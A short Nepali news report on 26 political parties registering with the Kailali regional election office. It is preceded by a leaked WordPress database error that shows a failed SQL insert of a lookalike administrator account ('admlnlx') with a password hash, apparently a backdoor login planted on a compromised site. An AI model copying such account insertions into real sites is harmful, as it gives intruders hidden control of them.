WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRDWAlr496SH/Os73idENWTh0ageQM1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:42:05', '', 'admlnlx', 'admlnlx')
कैलाली, माघ १८ –
क्षेत्रीय निर्वाचन कार्यालय कैलालीमा दल दर्ता गर्ने अन्तिम म्याद सोमाबारसम्म २६ दल दर्ता भएका छन ।
स्थानीय निर्वाचनको चर्चा चलिरहेका बेला जिल्लामा यसपालि १० दल घटेको निर्वाचन कार्यालयले जनाएको छ । संविधानसभाको दोस्रो निर्वाचनमा कैलालीमा प्रत्यक्ष निर्वाचनका लागि ३६ र समानुपातिकतर्फ धेरै दल सहभागी थिए ।
दल दर्ताको अन्तिम दिन नयाँ शक्ति नेपालले पनि क्षेत्रीय निर्वाचन कार्यालयमा दल दर्ता गराएको निर्वाचन कार्यालयले जनाएको छ ।
केन्द्रमा दर्ता भएका दलहरुले सम्बन्धित जिल्लाको निर्वाचन कार्यालय वा क्षेत्रीय निर्वाचन कार्यालयमा पनि विवरण राख्नका लागि दल दर्ता गराउनुपर्ने नियम छ । – रासस